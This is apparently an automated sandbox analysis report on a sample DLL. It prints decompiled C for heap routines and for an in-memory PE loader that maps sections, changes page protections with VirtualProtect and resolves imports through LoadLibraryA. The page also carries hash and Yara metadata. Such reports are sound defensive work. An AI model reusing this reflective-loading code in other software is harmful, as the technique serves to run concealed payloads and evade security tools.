Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
String ID:
API String ID: 2661975262-0
Opcode ID: f415d4f7b6aaaaeb9115a185c126b32be0306c5f0fa7f1318f6c47c720f3fa77
Instruction ID: e3735d432595b220704bcada92be5b3c7af02f538283d01a36ccf585f758a077
Opcode Fuzzy Hash: f415d4f7b6aaaaeb9115a185c126b32be0306c5f0fa7f1318f6c47c720f3fa77
Instruction Fuzzy Hash: 77016775A0571AAAFB10DBB08C86F5E3AA4EF023E5F210109F508AA0D5DF34A940DF56

Uniqueness

Uniqueness Score: -1.00%

Function 1000CEBD, Relevance: 4.6, APIs: 3, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000CEBD(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				void* _t2;
				void* _t6;
				void* _t10;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t22;
				intOrPtr _t24;
				void* _t28;
				void* _t30;
				void* _t32;

				_t18 = __edx;
				_t12 = HeapAlloc;
				do {
					_t32 =  *0x10335310; // 0x2b10000
					_t20 = _t30;
					if(_t32 == 0) {
						E10011F42(_t12, _t18, _t20, _t32);
						E10011DA2(0x1e);
						E10011B04(0xff);
					}
					_t1 =  *0x10337f3c; // 0x1
					if(_t1 != 1) {
						__eflags = _t1 - 3;
						if(__eflags != 0) {
							L10:
							__eflags = _t30;
							if(_t30 == 0) {
								_t20 = 1;
								__eflags = 1;
							}
							_t22 = _t20 + 0x0000000f & 0xfffffff0;
							__eflags = _t22;
							_push(_t22);
							goto L13;
						} else {
							_push(_t30);
							_t2 = E1000CE60(_t12, _t20, 0, __eflags);
							__eflags = _t2;
							if(__eflags == 0) {
								goto L10;
							}
						}
					} else {
						if(_t30 == 0) {
							_t10 = 1;
							__eflags = 1;
						} else {
							_t10 = _t30;
						}
						_push(_t10);
						L13:
						_push(0);
						_t2 = RtlAllocateHeap( *0x10335310); // executed
					}
					_t28 = _t2;
					if(_t28 == 0) {
						_t24 = 0xc;
						if( *0x103357e4 == _t2) {
							 *((intOrPtr*)(E1000F780(__eflags))) = _t24;
							L19:
							 *((intOrPtr*)(E1000F780(_t37))) = _t24;
						} else {
							goto L16;
						}
					}
					return _t28;
					L16:
					_t6 = E1001092A(_t30);
					_t37 = _t6;
				} while (_t6 != 0);
				goto L19;
			}

APIs

__FF_MSGBANNER.LIBCMT ref: 1000CED2

Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F69
Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F73

__NMSG_WRITE.LIBCMT ref: 1000CED9

Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E0E
Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E1F
Part of subcall function 10011DA2: GetModuleFileNameA.KERNEL32(00000000,103354E9,00000104,?,103352E0,00000000), ref: 10011E3B
Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E50
Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E63
Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E6C
Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E79
Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011EA6

Part of subcall function 10011B04: ___crtCorExitProcess.LIBCMT ref: 10011B08
Part of subcall function 10011B04: ExitProcess.KERNEL32 ref: 10011B12

Part of subcall function 1000CE60: ___sbh_alloc_block.LIBCMT ref: 1000CE88

RtlAllocateHeap.NTDLL(00000000), ref: 1000CF27

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
String ID:
API String ID: 3791426274-0
Opcode ID: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
Instruction ID: e2b4030b7ffdff5dfd6972142c91b8fd57cf3792c5bc4284219116a52f4c6e3d
Opcode Fuzzy Hash: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
Instruction Fuzzy Hash: 17012B3664936F5AF221D3699C81D7A72DDDB847F0B220036F908CA19ACA60DC419192

Uniqueness

Uniqueness Score: -1.00%

Function 1001B220, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1001B220(intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				int _t67;

				if(_a8[2] != 0) {
					_t4 =  &(_a8[3]); // 0x1
					if(( *_t4 & 0x02000000) == 0) {
						_t31 =  &(_a8[3]); // 0x1
						asm("sbb edx, edx");
						_v16 =  ~( ~( *_t31 & 0x20000000));
						_t34 =  &(_a8[3]); // 0x1
						asm("sbb ecx, ecx");
						_v24 =  ~( ~( *_t34 & 0x40000000));
						_t37 =  &(_a8[3]); // 0x1
						asm("sbb eax, eax");
						_v12 =  ~( ~( *_t37 & 0x80000000));
						_t42 = _v24 * 8; // 0x2035072d
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t42 + 0x103350c4 + _v12 * 4));
						_t49 =  &(_a8[3]); // 0x1
						if(( *_t49 & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t55 =  &(_a8[2]); // 0xb805ebc0
						_t67 = VirtualProtect( *_a8,  *_t55, _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							_push("Error protecting memory page");
							E1001AEC0(_t67);
							return 0;
						}
					}
					_t7 =  &(_a8[1]); // 0x330475c0
					if( *_a8 !=  *_t7) {
						L8:
						return 1;
					}
					if(_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
						L7:
						_t26 =  &(_a8[2]); // 0xb805ebc0
						 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))( *_a8,  *_t26, 0x4000,  *((intOrPtr*)(_a4 + 0x34))); // executed
						goto L8;
					} else {
						_t16 =  &(_a8[2]); // 0xb805ebc0
						if( *_t16 %  *(_a4 + 0x3c) != 0) {
							goto L8;
						}
						goto L7;
					}
				}
				return 1;
			}

0x1001b22d
0x1001b23c
0x1001b245
0x1001b2b0
0x1001b2bb
0x1001b2bf
0x1001b2c5
0x1001b2d0
0x1001b2d4
0x1001b2da
0x1001b2e4
0x1001b2e8
0x1001b2f4
0x1001b301
0x1001b307
0x1001b310
0x1001b31b
0x1001b31b
0x1001b329
0x1001b333
0x1001b33b
0x00000000
0x1001b33d
0x1001b33d
0x1001b342
0x00000000
0x1001b34a
0x1001b33b
0x1001b24f
0x1001b252
0x1001b2a3
0x00000000
0x1001b2a3
0x1001b25b
0x1001b27f
0x1001b28e
0x1001b29e
0x00000000
0x1001b26d
0x1001b273
0x1001b27d
0x00000000
0x00000000
0x00000000
0x1001b27d
0x1001b25b
0x00000000

Strings

Error protecting memory page, xrefs: 1001B33D

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: Error protecting memory page
API String ID: 0-1748499907
Opcode ID: 2fdaa3f8ac2132a0ab7f5db0e2b56953538e95dc798f7bf7b4009c1be8786609
Instruction ID: 5374f92ac9c7a156fd4897085e59d133f9b4e73f21f8500888812b2ad4014a11
Opcode Fuzzy Hash: 2fdaa3f8ac2132a0ab7f5db0e2b56953538e95dc798f7bf7b4009c1be8786609
Instruction Fuzzy Hash: 6E41B774A0450A9FDB08CF58C490B99B3B6FB88354F24C259EC1A9F355D771EE91CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000F81F, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000F81F(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10335310 = _t6;
				if(_t6 != 0) {
					_t7 = E1000F7C4(__eflags);
					__eflags = _t7 - 3;
					 *0x10337f3c = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1000FA94(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10335310);
							 *0x10335310 =  *0x10335310 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,1000EA0F,00000001), ref: 1000F830
HeapDestroy.KERNEL32 ref: 1000F866

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
Instruction ID: 18601b020fc9775d6ac859e2e5d9de66436f62596d67e2443513b26528c1d1d3
Opcode Fuzzy Hash: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
Instruction Fuzzy Hash: 0DE06574628312ABF700EB314C897A535D8E7807D2F21483DF404C84E5FFA0C640A741

Uniqueness

Uniqueness Score: -1.00%

Function 1001A9C0, Relevance: 2.6, APIs: 2, Instructions: 87
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1001A9C0(void* _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				void* __ebp;
				void* _t49;
				void* _t52;
				intOrPtr _t60;
				void* _t68;
				void* _t70;
				signed int _t76;
				signed int _t87;
				signed int _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;

				_t49 = _a4;
				_v8 = _t49;
				if(_v8 != 0) {
					__eflags =  *(_v8 + 0x10);
					if(__eflags != 0) {
						_t9 =  *_v8 + 0x28; // 0x1ab8068
						_t93 =  *((intOrPtr*)(_v8 + 4)) +  *_t9;
						__eflags = _t93;
						_v12 = _t93;
						_v12( *((intOrPtr*)(_v8 + 4)), 0, 0);
					}
					_push( *((intOrPtr*)(_v8 + 0x30)));
					E1000CA40(_t68, _t94, _t95, __eflags);
					_t97 = _t96 + 4;
					_t70 = _v8;
					__eflags =  *(_t70 + 8);
					if( *(_t70 + 8) == 0) {
						L12:
						_t52 = _v8;
						__eflags =  *(_t52 + 4);
						if( *(_t52 + 4) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x20))))( *((intOrPtr*)(_v8 + 4)), 0, 0x8000,  *((intOrPtr*)(_v8 + 0x34))); // executed
						}
						return HeapFree(GetProcessHeap(), 0, _v8);
					} else {
						_v16 = 0;
						while(1) {
							__eflags = _v16 -  *((intOrPtr*)(_v8 + 0xc));
							if(__eflags >= 0) {
								break;
							}
							_t60 =  *((intOrPtr*)(_v8 + 8));
							_t76 = _v16;
							__eflags =  *(_t60 + _t76 * 4);
							if( *(_t60 + _t76 * 4) != 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c))))( *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _v16 * 4)),  *((intOrPtr*)(_v8 + 0x34))); // executed
								_t97 = _t97 + 8;
							}
							_t87 = _v16 + 1;
							__eflags = _t87;
							_v16 = _t87;
						}
						_push( *((intOrPtr*)(_v8 + 8)));
						E1000CA40(_t68, _t94, _t95, __eflags);
						_t97 = _t97 + 4;
						goto L12;
					}
				}
				return _t49;
			}

0x1001a9c6
0x1001a9c9
0x1001a9d0
0x1001a9da
0x1001a9de
0x1001a9eb
0x1001a9eb
0x1001a9eb
0x1001a9ee
0x1001a9fc
0x1001a9fc
0x1001aa05
0x1001aa06
0x1001aa0b
0x1001aa0e
0x1001aa11
0x1001aa15
0x1001aa73
0x1001aa73
0x1001aa76
0x1001aa7a
0x1001aa97
0x1001aa99
0x00000000
0x1001aa17
0x1001aa17
0x1001aa29
0x1001aa2f
0x1001aa32
0x00000000
0x00000000
0x1001aa37
0x1001aa3a
0x1001aa3d
0x1001aa41
0x1001aa5d
0x1001aa5f
0x1001aa5f
0x1001aa23
0x1001aa23
0x1001aa26
0x1001aa26
0x1001aa6a
0x1001aa6b
0x1001aa70
0x00000000
0x1001aa70
0x1001aa15
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,?,1001BA9C), ref: 1001AAA2
HeapFree.KERNEL32(00000000,?,?,1001BA9C), ref: 1001AAA9

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: b0cc8eedbf95d30c958b110f402096a7116ea42a7fdb31a7e597f4bb8bd16cc3
Instruction ID: 036dfcbbb1d5d3e23a27430c7b480aaf999080cef5cc33bc9f92b78f6dea735d
Opcode Fuzzy Hash: b0cc8eedbf95d30c958b110f402096a7116ea42a7fdb31a7e597f4bb8bd16cc3
Instruction Fuzzy Hash: 9C319278A00108EFDB04DB94C684B9DB7B6FF89304F648198E9055B391D775EE81DB81

Uniqueness

Uniqueness Score: -1.00%

Function 1001AC03, Relevance: 2.5, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E1001AC03() {
				signed int _t93;
				intOrPtr _t97;
				signed int _t99;
				signed int _t106;
				signed int _t114;
				void* _t116;
				void* _t121;
				void* _t127;
				signed int _t173;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t186;
				void* _t187;

				L0:
				while(1) {
					L0:
					 *(_t182 - 4) =  *(_t182 - 4) + 0x14;
					if(IsBadReadPtr( *(_t182 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t182 - 4) + 0xc)) == 0) {
						break;
					}
					L3:
					_t7 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
					_t12 =  *((intOrPtr*)(_t182 + 8)) + 0x24; // 0xf3c7e850, executed
					_t97 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0xc)),  *_t7); // executed
					_t186 = _t184 + 8;
					 *((intOrPtr*)(_t182 - 0x20)) = _t97;
					if( *((intOrPtr*)(_t182 - 0x20)) != 0) {
						L5:
						_t17 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
						_push(4 +  *_t17 * 4);
						_t21 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
						_push( *_t21);
						_t99 = E1000E078(_t127,  *_t21, _t180, _t181, __eflags);
						_t187 = _t186 + 8;
						 *(_t182 - 0x18) = _t99;
						__eflags =  *(_t182 - 0x18);
						if( *(_t182 - 0x18) != 0) {
							L7:
							 *( *((intOrPtr*)(_t182 + 8)) + 8) =  *(_t182 - 0x18);
							_t34 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
							_t36 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t182 - 0x20));
							_t41 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
							 *( *((intOrPtr*)(_t182 + 8)) + 0xc) =  *_t41 + 1;
							__eflags =  *( *(_t182 - 4));
							if( *( *(_t182 - 4)) == 0) {
								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
								_t106 =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
								__eflags = _t106;
								 *(_t182 - 0x14) = _t106;
							} else {
								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 4));
								 *(_t182 - 0x14) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
							}
							while(1) {
								L12:
								__eflags =  *( *(_t182 - 0x1c));
								if( *( *(_t182 - 0x1c)) == 0) {
									break;
								}
								L13:
								__eflags =  *( *(_t182 - 0x1c)) & 0x80000000;
								if(( *( *(_t182 - 0x1c)) & 0x80000000) == 0) {
									 *((intOrPtr*)(_t182 - 0x24)) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 0x1c));
									_t77 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
									_t114 =  *((intOrPtr*)(_t182 - 0x24)) + 2;
									__eflags = _t114;
									_t81 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
									_t116 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t182 - 0x20)), _t114,  *_t77);
									_t187 = _t187 + 0xc;
									 *( *(_t182 - 0x14)) = _t116;
								} else {
									_t67 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
									_t71 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
									_t121 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t182 - 0x20)),  *( *(_t182 - 0x1c)) & 0x0000ffff,  *_t67);
									_t187 = _t187 + 0xc;
									 *( *(_t182 - 0x14)) = _t121;
								}
								L16:
								__eflags =  *( *(_t182 - 0x14));
								if( *( *(_t182 - 0x14)) != 0) {
									L18:
									L11:
									 *(_t182 - 0x1c) =  &(( *(_t182 - 0x1c))[1]);
									_t173 =  *(_t182 - 0x14) + 4;
									__eflags = _t173;
									 *(_t182 - 0x14) = _t173;
									continue;
								} else {
									L17:
									 *(_t182 - 0xc) = 0;
								}
								break;
							}
							L19:
							__eflags =  *(_t182 - 0xc);
							if(__eflags != 0) {
								L21:
								continue;
							} else {
								L20:
								_t87 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
								_t90 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t182 - 0x20)),  *_t87);
								SetLastError(0x7f);
							}
						} else {
							L6:
							_t25 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
							_t28 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t182 - 0x20)),  *_t25);
							SetLastError(0xe);
							 *(_t182 - 0xc) = 0;
						}
					} else {
						L4:
						SetLastError(0x7e);
						 *(_t182 - 0xc) = 0;
					}
					break;
				}
				L22:
				_t93 =  *(_t182 - 0xc);
				return _t93;
			}

0x1001ac03
0x1001ac03
0x1001ac03
0x1001ac09
0x1001ac1a
0x00000000
0x00000000
0x1001ac2d
0x1001ac30
0x1001ac41
0x1001ac44
0x1001ac46
0x1001ac49
0x1001ac50
0x1001ac66
0x1001ac69
0x1001ac73
0x1001ac77
0x1001ac7a
0x1001ac7b
0x1001ac80
0x1001ac83
0x1001ac86
0x1001ac8a
0x1001acb6
0x1001acbc
0x1001acc2
0x1001acc8
0x1001acce
0x1001acd4
0x1001acdd
0x1001ace3
0x1001ace6
0x1001ad0a
0x1001ad13
0x1001ad13
0x1001ad16
0x1001ace8
0x1001acf0
0x1001acfc
0x1001acfc
0x1001ad2d
0x1001ad2d
0x1001ad30
0x1001ad33
0x00000000
0x00000000
0x1001ad35
0x1001ad3a
0x1001ad40
0x1001ad72
0x1001ad78
0x1001ad7f
0x1001ad7f
0x1001ad8a
0x1001ad8d
0x1001ad8f
0x1001ad95
0x1001ad42
0x1001ad45
0x1001ad5b
0x1001ad5e
0x1001ad60
0x1001ad66
0x1001ad66
0x1001ad97
0x1001ad9a
0x1001ad9d
0x1001ada8
0x1001ad1b
0x1001ad21
0x1001ad27
0x1001ad27
0x1001ad2a
0x00000000
0x1001ad9f
0x1001ad9f
0x1001ad9f
0x1001ad9f
0x00000000
0x1001ad9d
0x1001adad
0x1001adad
0x1001adb1
0x1001add3
0x00000000
0x1001adb3
0x1001adb3
0x1001adb6
0x1001adc1
0x1001adc4
0x1001adcb
0x1001adcb
0x1001ac8c
0x1001ac8c
0x1001ac8f
0x1001ac9a
0x1001ac9d
0x1001aca4
0x1001acaa
0x1001acaa
0x1001ac52
0x1001ac52
0x1001ac54
0x1001ac5a
0x1001ac5a
0x00000000
0x1001ac50
0x1001add8
0x1001add8
0x1001adde

APIs

IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001AC12
SetLastError.KERNEL32(0000007E), ref: 1001AC54
_realloc.LIBCMT ref: 1001AC7B
SetLastError.KERNEL32(0000000E), ref: 1001ACA4

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLast$Read_realloc
String ID:
API String ID: 252108943-0
Opcode ID: ffd7bd065a5375d1ebe31af1967e484376c6c7ee4950f7abf1876d27f8b6798f
Instruction ID: e88f51b13af380f3804dcf3f93825a158e3d85187cb32834387337e861583c44
Opcode Fuzzy Hash: ffd7bd065a5375d1ebe31af1967e484376c6c7ee4950f7abf1876d27f8b6798f
Instruction Fuzzy Hash: EE01EF74A00208EFDB04CF94D985BADB7B1FF49315F618198E90AAB390C778AA81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1001B360, Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E1001B360(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t95;
				void* _t100;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;

				_t141 = __esi;
				_t140 = __edi;
				_t100 = __ebx;
				_t2 = _a16 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_t6 =  *_a16 + 0x14; // 0x2b34508b
				_t8 = ( *_t6 & 0x0000ffff) + 0x18; // 0x1001b9bd
				_v24 =  *_a16 + _t8;
				_v8 = 0;
				while(1) {
					_t16 =  *_a16 + 6; // 0xe2e905
					if(_v8 >= ( *_t16 & 0x0000ffff)) {
						break;
					}
					if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
						_t44 = _v24 + 0x14; // 0x2b34508b
						_t46 = _v24 + 0x10; // 0xb04d8b02
						_t78 = E1001AEA0(_a8,  *_t44 +  *_t46);
						_t143 = _t142 + 8;
						if(_t78 != 0) {
							_t49 = _a16 + 0x34; // 0x8b0aeb18
							_t51 = _v24 + 0x10; // 0xb04d8b02
							_t54 = _v24 + 0xc; // 0x8bb8558b
							_t56 = _a16 + 0x1c; // 0x8b1874b4, executed
							_t82 =  *((intOrPtr*)( *_t56))(_v20 +  *_t54,  *_t51, 0x1000, 4,  *_t49); // executed
							_t144 = _t143 + 0x14;
							_v12 = _t82;
							if(_v12 != 0) {
								_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
								E1000D1F0(_t100, _t140, _t141, _v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *((intOrPtr*)(_v24 + 0x10)));
								_t142 = _t144 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t25 = _a16 + 0x34; // 0x8b0aeb18
					_t29 = _v24 + 0xc; // 0x8bb8558b
					_t31 = _a16 + 0x1c; // 0x8b1874b4
					_t95 =  *((intOrPtr*)( *_t31))(_v20 +  *_t29, _v16, 0x1000, 4,  *_t25);
					_t145 = _t142 + 0x14;
					_v12 = _t95;
					if(_v12 != 0) {
						_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E1000CF80(_t140, _v12, 0, _v16);
						_t142 = _t145 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}

0x1001b360
0x1001b360
0x1001b360
0x1001b369
0x1001b36c
0x1001b379
0x1001b37d
0x1001b381
0x1001b384
0x1001b39f
0x1001b3a4
0x1001b3ab
0x00000000
0x00000000
0x1001b3b8
0x1001b42f
0x1001b435
0x1001b43d
0x1001b442
0x1001b447
0x1001b450
0x1001b45e
0x1001b468
0x1001b46f
0x1001b472
0x1001b474
0x1001b477
0x1001b47e
0x1001b48d
0x1001b4a5
0x1001b4aa
0x1001b4b3
0x1001b38d
0x1001b393
0x1001b39c
0x00000000
0x1001b39c
0x00000000
0x1001b480
0x00000000
0x1001b449
0x1001b3c0
0x1001b3c7
0x1001b427
0x00000000
0x1001b427
0x1001b3cc
0x1001b3e1
0x1001b3e8
0x1001b3eb
0x1001b3ed
0x1001b3f0
0x1001b3f7
0x1001b409
0x1001b412
0x1001b41f
0x1001b424
0x00000000
0x1001b424
0x00000000
0x1001b3f9
0x00000000

APIs

_memset.LIBCMT ref: 1001B41F

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: c8d1c34ba2033493e17770d96ce252c75c4e45244ca9a8230eca39014b465cc1
Instruction ID: 428323ba92f151b8b30d7bb4fc73863c6a18c270ec47e82ee642a415afc306ef
Opcode Fuzzy Hash: c8d1c34ba2033493e17770d96ce252c75c4e45244ca9a8230eca39014b465cc1
Instruction Fuzzy Hash: B151B8B4A0010ADFCB04DF94D991EAEB7B5FF48304F248598E915AB346D730EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001AB50, Relevance: 1.5, APIs: 1, Instructions: 15
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001AB50(void* __ecx, CHAR* _a4) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _t6;

				_t6 = LoadLibraryA(_a4); // executed
				_v8 = _t6;
				if(_v8 != 0) {
					return _v8;
				}
				return 0;
			}

0x1001ab58
0x1001ab5e
0x1001ab65
0x00000000
0x1001ab6b
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 1001AB58

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: df3a10f6024f408f15b2ad5c72ac785c734b8422dadc8378e0f8f39ab19adcd3
Instruction ID: 7c1de59f615f24355edd2097ee5eee0132e4033acb49ab430aa32c1c2748079c
